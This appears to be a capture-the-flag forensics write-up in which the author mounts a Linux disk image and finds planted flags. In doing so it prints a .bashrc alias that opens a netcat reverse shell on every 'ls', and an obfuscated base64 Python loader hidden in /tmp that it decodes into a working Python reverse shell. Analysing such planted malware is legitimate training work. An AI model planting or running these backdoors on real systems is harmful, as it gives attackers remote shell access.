Bad Fish
Stage 001
BRIEFING
Difficulty: Introductory
Uh Oh it seems a few bad fish got into the fish tank!
Can you find them all?
Challenge File: badfish.zip
Zip Password: bAdFi5h
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 1_This_Is_a_Fake_Flag
Work/Solution
Find the offset of the partition.
fdisk -l ./badfish.img
Disk ./badfish.img: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xae84473a
Device Boot Start End Sectors Size Id Type
./badfish.img1 * 2048 2097151 2095104 1023M 83 Linux
Block size of 512 bytes and start block is 2048. The offset is 512 * 2048 = 1048576.
mount -o loop,offset=1048576 badfish.img /mnt/tmp
Ok, this is a Linux disk image.
la /mnt/tmp
total 76K
lrwxrwxrwx 1 root root 7 Oct 3 2022 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Oct 23 2022 boot
drwxr-xr-x 4 root root 4.0K Oct 23 2022 dev
drwxr-xr-x 47 root root 4.0K Oct 23 2022 etc
drwxr-xr-x 3 root root 4.0K Oct 23 2022 home
lrwxrwxrwx 1 root root 30 Oct 22 2022 initrd.img -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx 1 root root 30 Oct 22 2022 initrd.img.old -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx 1 root root 7 Oct 3 2022 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Oct 3 2022 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Oct 3 2022 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Oct 3 2022 libx32 -> usr/libx32
drwx------ 2 root root 16K Oct 23 2022 lost+found
drwxr-xr-x 2 root root 4.0K Oct 3 2022 media
drwxr-xr-x 2 root root 4.0K Oct 3 2022 mnt
drwxr-xr-x 2 root root 4.0K Oct 3 2022 opt
drwxr-xr-x 2 root root 4.0K Jan 19 2022 proc
drwx------ 2 root root 4.0K Oct 3 2022 root
drwxr-xr-x 8 root root 4.0K Oct 22 2022 run
lrwxrwxrwx 1 root root 8 Oct 3 2022 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Oct 3 2022 srv
drwxr-xr-x 2 root root 4.0K Jan 19 2022 sys
drwxrwxrwt 3 root root 4.0K Oct 23 2022 tmp
drwxr-xr-x 14 root root 4.0K Oct 3 2022 usr
drwxr-xr-x 11 root root 4.0K Oct 3 2022 var
lrwxrwxrwx 1 root root 27 Oct 22 2022 vmlinuz -> boot/vmlinuz-5.19.0-2-amd64
lrwxrwxrwx 1 root root 27 Oct 22 2022 vmlinuz.old -> boot/vmlinuz-5.19.0-2-amd64
Found this flag in etc/apt/sources.list.
grep -r "1_" /mnt/tmp/etc
/mnt/tmp/etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt: # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt: # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/conf.d/rewrite/31_exim4-config_rewriting:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/exim4.conf.template:### end main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template: # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/exim4.conf.template: # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### end rewrite/31_exim4-config_rewriting
grep: /mnt/tmp/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg: binary file matches
/mnt/tmp/etc/apt/sources.list:deb 'http://1_5w1m_uP_dA_r3P0/ stretch main contrib non-free
/mnt/tmp/etc/ca-certificates.conf:mozilla/QuoVadis_Root_CA_1_G3.crt
Stage 002
BRIEFING
Difficulty: Introductory
Felines really do love fish.
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 2_This_Is_a_Fake_Flag
Work/Solution
This was my second flag I discovered. While exploring the mounted file system, I looked at the .bashrc file in /home/nemo, where I discovered the flag in an alias.
la home
total 4.0K
drwxr-xr-x 2 8877 8877 4.0K Oct 23 2022 nemo
la home/nemo
total 12K
-rw-r--r-- 1 8877 8877 220 Aug 25 2022 .bash_logout
-rw-r--r-- 1 8877 8877 3.5K Oct 23 2022 .bashrc
-rw-r--r-- 1 8877 8877 807 Aug 25 2022 .profile
tail -n5 home/nemo/.bashrc
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
alias ls='ls;nc 2_sM31ly_CaT 4454 -e /bin/bash'
Stage 003
BRIEFING
Difficulty: Introductory
Are you concerned how pollution is impacting our oceans?
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 3_This_Is_a_Fake_Flag
Work/Solution
I found this flag while exploring the mounted file system as well. It was in plain sight.
la bin/ | head -n 5
total 45M
-rwsr-xr-x 1 root root 31K Oct 22 2022 3_5tr1nGs_r_BaD_4_f15H
lrwxrwxrwx 1 root root 22 Apr 14 2022 Mail -> /etc/alternatives/Mail
-rwxr-xr-x 1 root root 67K Sep 20 2022 [
-rwxr-xr-x 1 root root 31K Oct 16 2022 addpart
Stage 004
BRIEFING
Difficulty: Easy
SSShhhhhhh! Don't tell anyone I got here.
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 4_This_Is_a_Fake_Flag
Work/Solution
I found this flag while attempting to solve Stage 001. After I mounted the .img file as described in Stage 001 I started poking around the file system. The first place I looked was in /tmp, where I discovered a Python file.
cd /mnt/tmp
la tmp
total 4.0K
drwxr-xr-x 2 root root 4.0K Oct 23 2022 .d
la tmp/.d
total 4.0K
-rwxr-xr-x 1 root root 611 Oct 23 2022 daily.py
The contents of daily.py:
import base64
test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
test = test + base64.b64decode(i).decode()
eval(test)
I added a print(test) statement to the end of the file:
import base64
test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
test = test + base64.b64decode(i).decode()
eval(test)
print(test)
Running the python file:
python tmp/.d/daily.py
base64.b64decode('CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKC
ksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=')
Decoding the output string:
echo 'CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=' | base64 -d
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("4_5n3aky_5nEakY",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])